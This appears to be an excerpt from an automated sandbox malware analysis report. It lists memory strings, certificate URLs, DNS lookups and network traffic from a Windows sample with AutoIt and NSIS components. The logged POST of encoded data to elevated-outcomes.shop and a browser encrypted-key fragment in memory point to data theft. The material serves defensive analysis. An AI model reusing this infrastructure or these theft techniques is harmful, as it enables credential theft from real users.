19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABt~r equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: @bing.com/videos/search www.facebook.com equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: bing.com/videos/search www.facebook.com equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic' equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic' equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic'@ equals www.facebook.com (Facebook)
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-3AtRQJCJTaCvAW3r8IbXW552FO059JGHecXNKsPqyDo=' 'strict-dynamic'@ equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000025.00000003.1803417504.0000012CDEE2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: extURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt"," equals www.youtube.com (Youtube)
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ive/cognitiveservices/ www.bing.com/fd/ls/ls.gif www.msn.com www.msn.cn www.microsoftstart.com cn.bing.com/api/ cn.bing.com/bnc/ cn.bing.com/pnp/ cn.bing.com/profile/interestmanager/update *.cn.mm.bing.net *.mm.cn.bing.net www.bing.com/HPImageArchive.aspx www.bing.com/api/custom/opal/reco/ www.bing.com/DSB cn.bing.com/DSB www.bing.com/DSB/partner/ cn.bing.com/DSB/partner/ www.bing.com/api/ www.bing.com/as/ www.bing.com/AS/Suggestions www.bing.com/AS/Suggestions/v2 www.bing.com/bnc/ www.bing.com/crop/warmer.png www.bing.com/historyHandler www.bing.com/images/sbidlg www.bing.com/pnp/ www.bing.com/profile/history/data www.bing.com/profile/interestmanager/update www.bing.com/retail/msn/api/shopcard www.bing.com/retailexp/msn/api/ www.bing.com/retailexpdata/msndata/ www.bing.com/rp/rms_pr.png www.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn msn-api.go2yd.com zerocodecms.blob.core.windows.net *.oneservice.msn.com *.oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://*.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlP
Source: global traffic DNS traffic detected: DNS query: ZuYwLYOGpsYmohRivNRzySjfrEDfR.ZuYwLYOGpsYmohRivNRzySjfrEDfR
Source: global traffic DNS traffic detected: DNS query: elevated-outcomes.shop
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic DNS traffic detected: DNS query: assets.msn.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: global traffic DNS traffic detected: DNS query: c.msn.com
Source: global traffic DNS traffic detected: DNS query: dns.quad9.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknown HTTP traffic detected: POST /NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cNCbNkQ5co2yv9Yi3V%2B4UngeF2wrQ9x0YVDwI%2Fnw%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 149
Host: elevated-outcomes.shop
Source: global traffic TCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:50093 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:62123 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:54621 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:55018 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:65297 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: global traffic TCP traffic: 192.168.11.20:60219 -> 239.255.255.250:1900
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1791550747.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C1E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1818041128.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1788688027.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: curcuma.exe, 00000025.00000003.1879613878.0000012CDEEBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cdn.adnxs-simple.com/w3c/policy/p3p.xml
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1791550747.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C1E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1818041128.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1788688027.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://e5.i.lencr.org/0A
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://e5.o.lencr.org0
Source: ADFoyxP.exe, 00000000.00000002.1649309138.0000000000408000.00000002.00000001.01000000.00000003.sdmp, ADFoyxP.exe, 00000000.00000000.860621425.0000000000408000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1818041128.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1788688027.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Seat.com, 0000000E.00000003.942989179.000000000469A000.00000004.00000800.00020000.00000000.sdmp, Seat.com, 0000000E.00000000.933109025.0000000000485000.00000002.00000001.01000000.00000007.sdmp, TradeHub.com, 00000017.00000000.958330490.0000000000885000.00000002.00000001.01000000.0000000A.sdmp, TradeHub.com, 00000019.00000002.1099287584.0000000000885000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD35F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
